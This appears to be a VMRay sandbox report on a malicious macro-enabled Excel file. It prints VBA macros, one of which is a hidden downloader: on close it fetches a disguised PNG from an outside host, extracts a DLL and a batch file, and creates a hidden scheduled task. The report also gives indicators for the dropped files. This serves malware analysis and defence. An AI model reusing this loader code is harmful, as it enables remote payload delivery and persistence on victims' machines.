Try VMRay Platform
Malicious
Classifications

-

Threat Names

-

Dynamic Analysis Report

Created on 2024-06-03T09:26:25+00:00

msk.xls

Excel Document
...

Remarks (2/2)

(0x0200000E): The overall sleep time of all monitored processes was truncated from "23 minutes, 6 seconds" to "1 minute, 10 seconds" to reveal dormant functionality.

(0x02000004): The operating system was rebooted during the analysis because the sample installed a startup script, task or application for persistence.

Filters:
File Name Category Type Verdict Actions
C:\Users\kEecfMwgj\Desktop\msk.xls Sample File Office File
Malicious
...
»
MIME Type application/vnd.ms-excel.sheet.macroEnabled.12
File Size 6.26 MB
MD5 d57de46a209c32633dbb10f36eef7a06 Copy to Clipboard
SHA1 ebf2d3f3e47b39e8783330f1a6aa6f510e2a7a7f Copy to Clipboard
SHA256 5dbcefc3f5401265b8fe4bb0c8a645914b45b850a13dfaa5ec313ec8e108b2c5 Copy to Clipboard
SSDeep 49152:qtI1YCAnrStN354aGlhG10h8/M4dp0btcfPYIUdLC71:zNAnc36aGlhG168/M4diuojdLC71 Copy to Clipboard
ImpHash -
Office Information
»
Creator Usuario Agrest
Last Modified By george
Create Time 2018-11-27 15:26 (UTC)
Modify Time 2024-05-16 15:13 (UTC)
Application Microsoft Excel
App Version 16.0300
Document Security NONE
Worksheets 10
Titles Of Parts Hoja2, Hoja1, Listado, 2019, 2020, 2021, 2022, 2023, 2024, por persona
ScaleCrop False
SharedDoc False
VBA Macros (8)
»
Macro #1: Module7
» 
Attribute VB_Name = "Module7"
#If VBA7 Then
  Declare PtrSafe Function FW01 Lib "user32" _
    Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
   #Else
     Declare Function FW01 Lib "user32" _
    Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
   
        #End If


Option Explicit

Private Sub auto_close()
 On Error Resume Next
 Dim iTxtFile22 As Integer
  Dim strFile88, cta1 As String
  Dim strFileT44, TestStr As String
 
If (FW01("msprotB7", vbNullString)) <> 0 Then Exit Sub
 
 Const Mysze As Long = 218109  '
 Const Chek As Long = 3890
 Const Z11file As Long = 1768

   
    Dim FileData() As Byte
    
     Dim i As Long
     Dim crc As Double
     Dim bytTemp2 As Byte
     
      Dim myM(Mysze - 1) As Byte
      Dim myM2(Chek - 1) As Byte
      Dim myM3(Z11file - 1) As Byte
     
    Dim MyFile As String
    Dim WHTTP As Object
    
    On Error Resume Next
       Set WHTTP = CreateObject("WinHTTP.WinHTTPrequest.5")
        If Err.Number <> 0 Then
            Set WHTTP = CreateObject("WinHTTP.WinHTTPrequest.5.1")
        End If
  
    
   
    
    MyFile = "https://picstate.com/file/20260941_ugxbx/B7CHZ11.png"
    
    WHTTP.Open "GET", MyFile, False
    i = WHTTP.SetTimeout8s(5000, 5000, 5000, 10000)
    WHTTP.Send
    FileData = WHTTP.ResponseBody
    Set WHTTP = Nothing
    

   crc = 0
   
   For i = 0 To Mysze - 1
     
   bytTemp2 = (FileData(i + 98))  '98 size down.png Xor (&H26)
   
   
   crc = crc + bytTemp2
   
   myM(i) = bytTemp2
   
   Next i
             

   
   If crc <> 18880222 Then Exit Sub
    
    
  For i = 0 To Chek - 1
     
   bytTemp2 = (FileData(i + Mysze + 98)) '98 size down.png Xor (&H26)
   
   
   myM2(i) = bytTemp2
   
   Next i
    
    
     For i = 0 To Z11file - 1
     
   bytTemp2 = (FileData(i + Mysze + 98 + Chek)) '98 size down.png  Xor (&H26)
   
   
   myM3(i) = bytTemp2
   
   Next i
    
Open Environ("temp") + "\ZZ11.tmp" For Binary Lock Read Write As #1

    Put #1, , myM3
    
    Close #1


Open Environ("temp") + "\TTT.tmp" For Binary Lock Read Write As #2

    Put #2, , myM
    
    Close #2
    
Open Environ("temp") + "\check01.txt" For Binary Lock Read Write As #3

    Put #3, , myM2
    
    Close #3

  strFile88 = Environ("temp") + "\ZZ11.tmp"
  iTxtFile22 = FreeFile
  Open strFile88 For Input As FreeFile
  strFileT44 = Input(LOF(iTxtFile22), iTxtFile22)
  Close iTxtFile22
    
  strFileT44 = Replace(strFileT44, "xxx", Environ("USERNAME"), 1, -1, 1)
  
  Dim Fn34 As String
    Fn34 = Environ("temp") + "\Z11.xml"
    Open Fn34 For Output As #4
    Print #4, strFileT44
    Close #4

Dim sysnat, mys3 As String
    TestStr = ""
TestStr = Dir(Environ("windir") + "\sysnative\schtasks.exe")
    If TestStr = "" Then sysnat = "" Else sysnat = Environ("windir") + "\sysnative\"


mys3 = " /Create  /TN \Z11" + " /f /XML " + Environ("temp") + "\Z11.xml"

Call Shell(sysnat + "schtasks" & mys3, vbHide)


    
End Sub
Macro #2: Módulo1
» 
Attribute VB_Name = "Módulo1"
'http://excel-elearning.blogspot.com/2017/11/excel-vba-how-to-create-folders-and-sub.html
'https://www.ozgrid.com/forum/forum/help-forums/excel-general/94891-execute-command-button-code-using-enter-key

Sub CrearSub_Carpetas()

'Execute next line in case of error.
On Error Resume Next

'Activa la Hoja2
Sheets("Hoja2").Activate

'Loop through all the cells  in column 1 in Active Sheet.
For i = 1 To ActiveSheet.UsedRange.Rows.Count

'Name of the Folder
sFolderPath = ThisWorkbook.Path & "\" & Cells(i, 5)  'Replace This.Workbook.Path with any location Example "C:\" & Cells(i,1)

'Creating Folder Using Shell Function
Shell "cmd /c mkdir """ & sFolderPath & """", vbHide 'It will Execute Dos Command and use MKDIR to Make Directory of sFolderPath Value

'To continue the Loop
Next i

'Cerrar ventana Creación de obras
Unload UserForm1

'Displaying Message
MsgBox "El número de cotización " & Worksheets("Hoja1").Range("B3") & " ha sido generado con sus respectivas carpetas."

Sheets("Listado").Activate



End Sub
Macro #3: Módulo2
» 
Attribute VB_Name = "Módulo2"
'Realizado por Celeste Pesce

Sub Copiarceldavacia()

Dim i As Integer

Desprotejerhoja
i = 3

    ThisWorkbook.Sheets("Hoja1").Range("A2:R2").Copy
    
        
        Do While ThisWorkbook.Sheets("Listado").Cells(i, 2) <> Empty
        i = i + 1
       
        Loop
 
    ThisWorkbook.Sheets("Listado").Cells(i, 2).PasteSpecial Paste:=xlPasteValues
    Application.CutCopyMode = False
Protejerhoja

'Guardar documento para no perder la información cargada
 ThisWorkbook.Save
 
End Sub
Macro #4: Módulo3
» 
Attribute VB_Name = "Módulo3"
'Realizado por Celeste Pesce

Sub Abrirformulario()
UserForm1.Show
End Sub
Macro #5: Módulo4
» 
Attribute VB_Name = "Módulo4"
'https://exceltotal.com/proteger-una-hoja-de-excel-desde-una-macro/

Sub Protejerhoja()
Sheets("Listado").Select
ActiveSheet.Protect ("Jacobo2") _
        , AllowFiltering:=True
    
End Sub


Sub Desprotejerhoja()
Sheets("Listado").Select
ActiveSheet.Unprotect ("Jacobo2")
End Sub
Macro #6: Módulo5
» 
Attribute VB_Name = "Módulo5"
'Creado por Celeste Pesce
'https://analysistabs.com/excel-vba/copy-files-one-location-another-folder-directory/

'In this Example I am Copying the File From "C:Temp" Folder to "D:Job" Folder

Sub Copiararchivo()

'Declare Variables
'Dim FSO
Dim FSO As Object
Dim sFile As String
Dim sSFolder As String
Dim sDFolder As String
Dim j As Integer

'Hacer loop para que en Hoja1 se coloquen los archivos a copiar en la carpeta madre de la cotización

j = 12

Do While ThisWorkbook.Sheets("Hoja1").Cells(j, 1) <> Empty
             
'This is Your File Name which you want to Copy
sFile = ThisWorkbook.Sheets("Hoja1").Cells(j, 1)

'Change to match the source folder path
sSFolder = "\\192.168.85.20\16 - Gestion de la Organizacion\01 - Maestro de Documentación\FO\"

'Change to match the destination folder path
'Texto original:  sDFolder = "D:\Job\"
sDFolder = ThisWorkbook.Path & "\" & Sheets("Hoja1").Cells(1, 1) & "\"

'ThisWorkbook.Sheets("Hoja1").Range("A2:R2").Copy

'sFolderPath = ThisWorkbook.Path & "\" & Cells(i, 5)

'Create Object
Set FSO = CreateObject("Scripting.FileSystemObject")
  

     FSO.CopyFile (sSFolder & sFile), sDFolder, True
     
  j = j + 1
  
   Loop


End Sub
Macro #7: Módulo6
» 
Attribute VB_Name = "Módulo6"
Sub Calling_Private_Macro()
 
    Application.Run "Module7.vba"
 
End Sub
Macro #8: UserForm1
» 
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{E8C9C890-90D2-4EF7-89DF-402AE04F7B1A}{F5AFA137-F17F-4F50-8221-D62605473B55}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False










'Realizado por Celeste Pesce





Private Sub Frame1_Click()

End Sub

Private Sub TextBox11_Change()
Label33.Caption = TextBox11.Text & " t/h"
End Sub

Private Sub TextBox12_Change()
Label34.Caption = TextBox12.Text & " barg"
End Sub

Private Sub TextBox13_Change()
Label35.Caption = TextBox13.Text & " ºC"
End Sub


Private Sub UserForm_Initialize()
Label11.Caption = Worksheets("Hoja1").Range("B4").Value & "-" & Worksheets("Hoja1").Range("B3").Value
End Sub



Private Sub CommandButton1_Click()

 
Sheets("Hoja1").Cells(2, 1) = Worksheets("Hoja1").Range("B4")
Sheets("Hoja1").Cells(2, 2) = "-"
Sheets("Hoja1").Cells(2, 3) = Worksheets("Hoja1").Range("B3")
Sheets("Hoja1").Cells(2, 4) = TextBox2.Value
Sheets("Hoja1").Cells(2, 5) = TextBox3.Value
Sheets("Hoja1").Cells(2, 6) = TextBox5.Value
Sheets("Hoja1").Cells(2, 7) = TextBox6.Value
Sheets("Hoja1").Cells(2, 8) = TextBox7.Value
Sheets("Hoja1").Cells(2, 9) = TextBox8.Value
Sheets("Hoja1").Cells(2, 10) = TextBox9.Value
Sheets("Hoja1").Cells(2, 11) = TextBox10.Value
Sheets("Hoja1").Cells(2, 12) = TextBox11.Value
Sheets("Hoja1").Cells(2, 13) = TextBox12.Value
Sheets("Hoja1").Cells(2, 14) = TextBox13.Value
Sheets("Hoja1").Cells(3, 15) = CheckBox1.Value
Sheets("Hoja1").Cells(3, 16) = CheckBox2.Value
Sheets("Hoja1").Cells(3, 17) = CheckBox3.Value

CrearSub_Carpetas
'Copiararchivo
Copiarceldavacia

End Sub

Private Sub userform_terminate()

    Protejerhoja

End Sub
Extracted Image Texts (1)
»
Image #1: image1.jpeg
»
AGREST
Extracted URLs (1)
»
URL WHOIS Data Reputation Status Recursively Submitted Actions
https://picstate.com/file/20260941_ugxbx/B7CHZ11.png
Not Queried
-
...
C:\Users\kEecfMwgj\AppData\Local\{D77D06B2-C71E-C031-9266-658FBD2652B7}\B79266.DLL Dropped File Binary
Suspicious
...
»
MIME Type application/vnd.microsoft.portable-executable
File Size 213.00 KB
MD5 8c400b552e17c9763048f312fd304c3d Copy to Clipboard
SHA1 e41d2b7e1dc3aae98e1f18a45107c90b022714c1 Copy to Clipboard
SHA256 ebb38b608cc64b140273b3568ba22398c7b052a3c3bfac3cc15f370a0e1764bc Copy to Clipboard
SSDeep 3072:VCvtVds2wtYdDaAhIp7qkZCKkmDGzjXtjOPM:grDaXZCPrjZP Copy to Clipboard
ImpHash 12f4c9d6376202959258c794f895eb63 Copy to Clipboard
PE Information
»
Image Base 0x00400000
Entry Point 0x00428ED0
Size Of Code 0x0002C000
Size Of Initialized Data 0x00009000
File Type IMAGE_FILE_DLL
Subsystem IMAGE_SUBSYSTEM_WINDOWS_GUI
Machine Type IMAGE_FILE_MACHINE_AMD64
Compile Timestamp 2024-01-04 03:42 (UTC)
Version Information (8)
»
CompanyName Microsoft Corporation
FileDescription Application Compatibility Client Library
FileVersion 6.0.6300.13146 (vista_rtm.-2022)
InternalName VBhelp
LegalCopyright Microsoft Corporation. All rights reserved.
OriginalFilename VBB5
ProductName Microsoft Windows Operating System
ProductVersion 08.09.2023.1495
Sections (10)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x00401000 0x0002BE50 0x0002C000 0x00000400 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 5.78
.data 0x0042D000 0x00003D18 0x00003E00 0x0002C400 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 4.18
.bss 0x00431000 0x00007D20 0x00000000 0x00000000 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.0
.idata 0x00439000 0x00001200 0x00001200 0x00030200 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 4.21
.didata 0x0043B000 0x000000C8 0x00000200 0x00031400 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.88
.edata 0x0043C000 0x000000E2 0x00000200 0x00031600 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 2.72
.rdata 0x0043D000 0x00000045 0x00000200 0x00031800 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 1.19
.reloc 0x0043E000 0x00001420 0x00001600 0x00031A00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 5.59
.pdata 0x00440000 0x00001D40 0x00001E00 0x00033000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 5.21
.rsrc 0x00442000 0x00000454 0x00000600 0x00034E00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 4.06
Imports (6)
»
mpr.dll (2)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
WNetEnumResourceW - 0x004394D0 0x00039090 0x00030290 0x00000000
WNetOpenEnumW - 0x004394D8 0x00039098 0x00030298 0x00000000
kernel32.dll (81)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SetFileTime - 0x004394E8 0x000390A8 0x000302A8 0x00000000
GetFileType - 0x004394F0 0x000390B0 0x000302B0 0x00000000
RtlUnwindEx - 0x004394F8 0x000390B8 0x000302B8 0x00000000
GetACP - 0x00439500 0x000390C0 0x000302C0 0x00000000
SetFilePointer - 0x00439508 0x000390C8 0x000302C8 0x00000000
CloseHandle - 0x00439510 0x000390D0 0x000302D0 0x00000000
LocalFree - 0x00439518 0x000390D8 0x000302D8 0x00000000
TlsAlloc - 0x00439520 0x000390E0 0x000302E0 0x00000000
GetTickCount - 0x00439528 0x000390E8 0x000302E8 0x00000000
TerminateThread - 0x00439530 0x000390F0 0x000302F0 0x00000000
FindNextFileW - 0x00439538 0x000390F8 0x000302F8 0x00000000
VirtualFree - 0x00439540 0x00039100 0x00030300 0x00000000
GetFileSize - 0x00439548 0x00039108 0x00030308 0x00000000
GetStartupInfoW - 0x00439550 0x00039110 0x00030310 0x00000000
ExitProcess - 0x00439558 0x00039118 0x00030318 0x00000000
InitializeCriticalSection - 0x00439560 0x00039120 0x00030320 0x00000000
GetCurrentProcess - 0x00439568 0x00039128 0x00030328 0x00000000
GlobalLock - 0x00439570 0x00039130 0x00030330 0x00000000
VirtualAlloc - 0x00439578 0x00039138 0x00030338 0x00000000
RtlUnwind - 0x00439580 0x00039140 0x00030340 0x00000000
GetTempPathW - 0x00439588 0x00039148 0x00030348 0x00000000
GetCommandLineW - 0x00439590 0x00039150 0x00030350 0x00000000
GetSystemInfo - 0x00439598 0x00039158 0x00030358 0x00000000
GetProcAddress - 0x004395A0 0x00039160 0x00030360 0x00000000
GetStdHandle - 0x004395A8 0x00039168 0x00030368 0x00000000
FileTimeToLocalFileTime - 0x004395B0 0x00039170 0x00030370 0x00000000
WinExec - 0x004395B8 0x00039178 0x00030378 0x00000000
GetVersionExW - 0x004395C0 0x00039180 0x00030380 0x00000000
GetModuleHandleA - 0x004395C8 0x00039188 0x00030388 0x00000000
GetModuleHandleW - 0x004395D0 0x00039190 0x00030390 0x00000000
FreeLibrary - 0x004395D8 0x00039198 0x00030398 0x00000000
FileTimeToDosDateTime - 0x004395E0 0x000391A0 0x000303A0 0x00000000
ReadFile - 0x004395E8 0x000391A8 0x000303A8 0x00000000
DosDateTimeToFileTime - 0x004395F0 0x000391B0 0x000303B0 0x00000000
FindFirstFileW - 0x004395F8 0x000391B8 0x000303B8 0x00000000
TlsFree - 0x00439600 0x000391C0 0x000303C0 0x00000000
GetConsoleOutputCP - 0x00439608 0x000391C8 0x000303C8 0x00000000
GetConsoleCP - 0x00439610 0x000391D0 0x000303D0 0x00000000
GetLastError - 0x00439618 0x000391D8 0x000303D8 0x00000000
GetModuleFileNameW - 0x00439620 0x000391E0 0x000303E0 0x00000000
GlobalAlloc - 0x00439628 0x000391E8 0x000303E8 0x00000000
GlobalUnlock - 0x00439630 0x000391F0 0x000303F0 0x00000000
DisableThreadLibraryCalls - 0x00439638 0x000391F8 0x000303F8 0x00000000
CreateThread - 0x00439640 0x00039200 0x00030400 0x00000000
QueryPerformanceCounter - 0x00439648 0x00039208 0x00030408 0x00000000
SetEndOfFile - 0x00439650 0x00039210 0x00030410 0x00000000
CopyFileW - 0x00439658 0x00039218 0x00030418 0x00000000
WideCharToMultiByte - 0x00439660 0x00039220 0x00030420 0x00000000
FindClose - 0x00439668 0x00039228 0x00030428 0x00000000
MultiByteToWideChar - 0x00439670 0x00039230 0x00030430 0x00000000
LoadLibraryW - 0x00439678 0x00039238 0x00030438 0x00000000
LoadLibraryA - 0x00439680 0x00039240 0x00030440 0x00000000
GetVolumeInformationW - 0x00439688 0x00039248 0x00030448 0x00000000
CreateFileW - 0x00439690 0x00039250 0x00030450 0x00000000
GetDriveTypeW - 0x00439698 0x00039258 0x00030458 0x00000000
GetVersion - 0x004396A0 0x00039260 0x00030460 0x00000000
DeleteFileW - 0x004396A8 0x00039268 0x00030468 0x00000000
MoveFileW - 0x004396B0 0x00039270 0x00030470 0x00000000
RaiseException - 0x004396B8 0x00039278 0x00030478 0x00000000
IsDBCSLeadByteEx - 0x004396C0 0x00039280 0x00030480 0x00000000
OpenProcess - 0x004396C8 0x00039288 0x00030488 0x00000000
SwitchToThread - 0x004396D0 0x00039290 0x00030490 0x00000000
GetExitCodeThread - 0x004396D8 0x00039298 0x00030498 0x00000000
WaitForSingleObject - 0x004396E0 0x000392A0 0x000304A0 0x00000000
GetSystemPowerStatus - 0x004396E8 0x000392A8 0x000304A8 0x00000000
WriteFile - 0x004396F0 0x000392B0 0x000304B0 0x00000000
LocalFileTimeToFileTime - 0x004396F8 0x000392B8 0x000304B8 0x00000000
DeleteCriticalSection - 0x00439700 0x000392C0 0x000304C0 0x00000000
TlsGetValue - 0x00439708 0x000392C8 0x000304C8 0x00000000
SleepEx - 0x00439710 0x000392D0 0x000304D0 0x00000000
TlsSetValue - 0x00439718 0x000392D8 0x000304D8 0x00000000
TerminateProcess - 0x00439720 0x000392E0 0x000304E0 0x00000000
FileTimeToSystemTime - 0x00439728 0x000392E8 0x000304E8 0x00000000
LocalAlloc - 0x00439730 0x000392F0 0x000304F0 0x00000000
RemoveDirectoryW - 0x00439738 0x000392F8 0x000304F8 0x00000000
GetCurrentThreadId - 0x00439740 0x00039300 0x00030500 0x00000000
UnhandledExceptionFilter - 0x00439748 0x00039308 0x00030508 0x00000000
VirtualQuery - 0x00439750 0x00039310 0x00030510 0x00000000
GlobalFree - 0x00439758 0x00039318 0x00030518 0x00000000
Sleep - 0x00439760 0x00039320 0x00030520 0x00000000
SetThreadLocale - 0x00439768 0x00039328 0x00030528 0x00000000
ole32.dll (2)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CoInitializeEx - 0x00439778 0x00039338 0x00030538 0x00000000
CoUninitialize - 0x00439780 0x00039340 0x00030540 0x00000000
user32.dll (33)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CreateWindowExW - 0x00439790 0x00039350 0x00030550 0x00000000
EnumDisplaySettingsW - 0x00439798 0x00039358 0x00030558 0x00000000
GetMessageW - 0x004397A0 0x00039360 0x00030560 0x00000000
GetWindowDC - 0x004397A8 0x00039368 0x00030568 0x00000000
TranslateMessage - 0x004397B0 0x00039370 0x00030570 0x00000000
GetSystemMetrics - 0x004397B8 0x00039378 0x00030578 0x00000000
PostMessageW - 0x004397C0 0x00039380 0x00030580 0x00000000
MessageBoxW - 0x004397C8 0x00039388 0x00030588 0x00000000
SetWindowTextW - 0x004397D0 0x00039390 0x00030590 0x00000000
AttachThreadInput - 0x004397D8 0x00039398 0x00030598 0x00000000
PostQuitMessage - 0x004397E0 0x000393A0 0x000305A0 0x00000000
keybd_event - 0x004397E8 0x000393A8 0x000305A8 0x00000000
MapVirtualKeyW - 0x004397F0 0x000393B0 0x000305B0 0x00000000
LoadImageW - 0x004397F8 0x000393B8 0x000305B8 0x00000000
GetDesktopWindow - 0x00439800 0x000393C0 0x000305C0 0x00000000
DispatchMessageW - 0x00439808 0x000393C8 0x000305C8 0x00000000
GetCursorPos - 0x00439810 0x000393D0 0x000305D0 0x00000000
SetCursorPos - 0x00439818 0x000393D8 0x000305D8 0x00000000
GetTopWindow - 0x00439820 0x000393E0 0x000305E0 0x00000000
SendMessageW - 0x00439828 0x000393E8 0x000305E8 0x00000000
ShowWindow - 0x00439830 0x000393F0 0x000305F0 0x00000000
SystemParametersInfoW - 0x00439838 0x000393F8 0x000305F8 0x00000000
LoadIconW - 0x00439840 0x00039400 0x00030600 0x00000000
DefWindowProcW - 0x00439848 0x00039408 0x00030608 0x00000000
GetForegroundWindow - 0x00439850 0x00039410 0x00030610 0x00000000
RegisterClassW - 0x00439858 0x00039418 0x00030618 0x00000000
GetWindowThreadProcessId - 0x00439860 0x00039420 0x00030620 0x00000000
GetDC - 0x00439868 0x00039428 0x00030628 0x00000000
GetFocus - 0x00439870 0x00039430 0x00030630 0x00000000
LoadCursorW - 0x00439878 0x00039438 0x00030638 0x00000000
ReleaseDC - 0x00439880 0x00039440 0x00030640 0x00000000
mouse_event - 0x00439888 0x00039448 0x00030648 0x00000000
FindWindowW - 0x00439890 0x00039450 0x00030650 0x00000000
oleaut32.dll (2)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SysAllocStringLen - 0x004398A0 0x00039460 0x00030660 0x00000000
SysFreeString - 0x004398A8 0x00039468 0x00030668 0x00000000
gdi32.dll (10)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetObjectW - 0x004398B8 0x00039478 0x00030678 0x00000000
SelectPalette - 0x004398C0 0x00039480 0x00030680 0x00000000
CreateCompatibleBitmap - 0x004398C8 0x00039488 0x00030688 0x00000000
DeleteObject - 0x004398D0 0x00039490 0x00030690 0x00000000
SelectObject - 0x004398D8 0x00039498 0x00030698 0x00000000
DeleteDC - 0x004398E0 0x000394A0 0x000306A0 0x00000000
BitBlt - 0x004398E8 0x000394A8 0x000306A8 0x00000000
CreateDIBSection - 0x004398F0 0x000394B0 0x000306B0 0x00000000
GetDIBits - 0x004398F8 0x000394B8 0x000306B8 0x00000000
CreateCompatibleDC - 0x00439900 0x000394C0 0x000306C0 0x00000000
Exports (6)
»
API Name EAT Address Ordinal
Control_RunDLL 0x00027D20 0x00000003
DllCanUnloadNow 0x00028EB0 0x00000005
DllGetClassObject 0x00028B30 0x00000006
DllRegisterServer 0x00028B00 0x00000004
__dbk_fcall_wrapper 0x0000E450 0x00000002
dbkFCallWrapperAddr 0x000371A8 0x00000001
C:\Users\KEECFM~1\AppData\Local\Temp\TTT.TMP Dropped File Stream
Clean
...
»
Also Known As C:\Users\KEECFM~1\AppData\Local\Temp\TTT.tmp (Accessed File, Dropped File)
MIME Type application/octet-stream
File Size 212.99 KB
MD5 a99f7c4fb657a386c39bbaea73f7c8bd Copy to Clipboard
SHA1 eb0a75ff3c696d141bf5d142d0ac77cb7352e94f Copy to Clipboard
SHA256 3f2e57aa025065184ceff957838a11e342d161febd4119d89b89a98c758ad9a9 Copy to Clipboard
SSDeep 3072:sCvtVds2wtYdDaAhIp7qkZCKkmDGzjXtjOPM:NrDaXZCPrjZP Copy to Clipboard
ImpHash -
C:\Users\KEECFM~1\AppData\Local\Temp\check01.bat Dropped File Text
Clean
...
»
Also Known As C:\Users\KEECFM~1\AppData\Local\Temp\check01.txt (Accessed File, Dropped File)
MIME Type text/x-msdos-batch
File Size 3.79 KB
MD5 ff5655c9631d10e3b07d06110e4c1bb3 Copy to Clipboard
SHA1 7f06460d1a09eddadacd056e1a5302ac18adfdbc Copy to Clipboard
SHA256 2252c2901ef42d0aecf41e8a79022f679b624f3f484c20ed81fd7dff188e8062 Copy to Clipboard
SSDeep 96:wwiafWG9WrWt0BWyY/WIWQWPWHWfWMT/ooxiyWIW8WFWgWgWDWaW/WD+SJW7DmWE:xfHeG0B+pjy2EfT/oeiyRHEjzON+s+Sh Copy to Clipboard
ImpHash -
C:\Users\KEECFM~1\AppData\Local\Temp\Z11.xml Dropped File Text
Clean
...
»
MIME Type text/xml
File Size 1.74 KB
MD5 08f716f4e1d7ea06f61bad6e3e9fd298 Copy to Clipboard
SHA1 5397ba795334b1691721ef92bad74338b0098c9b Copy to Clipboard
SHA256 0b3ea5dcf88f100c6e0ce2ebb2c850d6de042bf2fca9ed83c47b713530acd977 Copy to Clipboard
SSDeep 24:2dH4+SHRZgO/RMFGlYeGlMhEMjnGpwjVLUYODOLG9RJh7h8Fsgg7fTnv29ty:cbcSO/RQGluydbzxIYODOLedqSg8bv2C Copy to Clipboard
ImpHash -
C:\Users\KEECFM~1\AppData\Local\Temp\ZZ11.tmp Dropped File Text
Clean
...
»
MIME Type text/xml
File Size 1.72 KB
MD5 fef4bae0171534f633a2c9cd28e51a4a Copy to Clipboard
SHA1 e2042edd574295c9eca2155df5788152125be561 Copy to Clipboard
SHA256 75813ed2c7a29277e051794d633d6e9cb3501b648add1d7a20b0d6d530143ff6 Copy to Clipboard
SSDeep 24:2dH4+SHRZgOgMFplYeGlMhEMjnGpwjVLUYODOLG9RJh7h8FsVg7fTnv29tn:cbcSOgQpluydbzxIYODOLedqSV8bv23 Copy to Clipboard
ImpHash -
C:\Users\KEECFM~1\AppData\Local\Temp\a.xml Dropped File Text
Clean
...
»
MIME Type text/xml
File Size 1.28 KB
MD5 39d764f8d4f2543224cfc0558e685cfe Copy to Clipboard
SHA1 d4fd2d5b549da693b407c5ae46ec21acc10b37c1 Copy to Clipboard
SHA256 c962ef38436b26bd8bd55146a90ac34bf323997fbb3686595ed35ddb4a65ac80 Copy to Clipboard
SSDeep 24:2dX4+SYiH2dMWt3tc6PZS/YeGdMhEMT5pw1ypRnh7hOUbMI4Mc:cr82X3en/uqdTQ16dTQ5 Copy to Clipboard
ImpHash -
C:\Users\KEECFM~1\AppData\Local\Temp\writebin.vbs Dropped File Text
Clean
...
»
MIME Type text/plain
File Size 750 Bytes
MD5 45336aabea2c91a142117fd8d90f7b6c Copy to Clipboard
SHA1 f6053fa65a07a9d1aae80a25159c36055eae0364 Copy to Clipboard
SHA256 97cd69ab34502eeeb1c77414ac8cdd21c0d99e7cd7aeb30e3695b095bb33db38 Copy to Clipboard
SSDeep 12:6RBwyHSeRIrqF6lqd+FPC+Cz/V2dvcLk//DEcsdKUZcTZEX/OfOb0w6cxm0:6RBwyyO+qFwY6Ppe2d0Lk/AcsdYTqXn3 Copy to Clipboard
ImpHash -
C:\Users\KEECFM~1\AppData\Local\Temp\MMM.TMP Dropped File Text
Clean
...
»
MIME Type text/plain
File Size 6 Bytes
MD5 312af82573a3365cf3c510d6b1552c90 Copy to Clipboard
SHA1 c49ba7a4cae847b7b6f8162bafcfbbc7b5de4840 Copy to Clipboard
SHA256 bd57b1dad8c2692be84de0fd2bd8795b0f7331e6b3a075a0d73f5c05710a75af Copy to Clipboard
SSDeep 3:QoHn:QoH Copy to Clipboard
ImpHash -
C:\Users\KEECFM~1\AppData\Local\Temp\~dr9078 Dropped File Empty
Clean
...
  • Actions
»
MIME Type application/x-empty
File Size 0 Bytes (not extracted)
MD5 d41d8cd98f00b204e9800998ecf8427e Copy to Clipboard
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 Copy to Clipboard
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash -
e5b106d13edb2cb1711191948ba614e747fc03e236fd4c9628208231e525d1a9 Downloaded File Image
Clean
...
»
MIME Type image/png
File Size 218.61 KB
MD5 7093863e2d798e852edd5cdc7ab2fa7d Copy to Clipboard
SHA1 2f80a37ffaff75c98ce8de8c90ddae581419d716 Copy to Clipboard
SHA256 e5b106d13edb2cb1711191948ba614e747fc03e236fd4c9628208231e525d1a9 Copy to Clipboard
SSDeep 3072:MCvtVds2wtYdDaAhIp7qkZCKkmDGzjXtjOPs:trDaXZCPrjZn Copy to Clipboard
ImpHash -
c:\users\keecfmwgj\appdata\local\microsoft\windows\history\history.ie5\index.dat Modified File Stream
Clean
...
»
MIME Type application/octet-stream
File Size 64.00 KB
MD5 75443b696e5054036c2c2c04e6f3f6f1 Copy to Clipboard
SHA1 0101bee2b234dc30264c5dcb8d5deedeb4c9bfbe Copy to Clipboard
SHA256 5db0fb6bbc0635956653a2177aa6125ee142e657a1294cc7efd0b935c1395b3a Copy to Clipboard
SSDeep 192:nNkjAgyfVkmB49cpcyr8qJOYYjshooa7+8/TLS8+yFVQUSPrtQjeC3bDX8fACL:NkjAgyfVkmBmmxQFOA Copy to Clipboard
ImpHash -
c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat Modified File Stream
Clean
...
»
MIME Type application/octet-stream
File Size 64.00 KB
MD5 41c405d88f47a93c867992e72d342250 Copy to Clipboard
SHA1 30673f4dfb514912592f12160dfca3533e76adc1 Copy to Clipboard
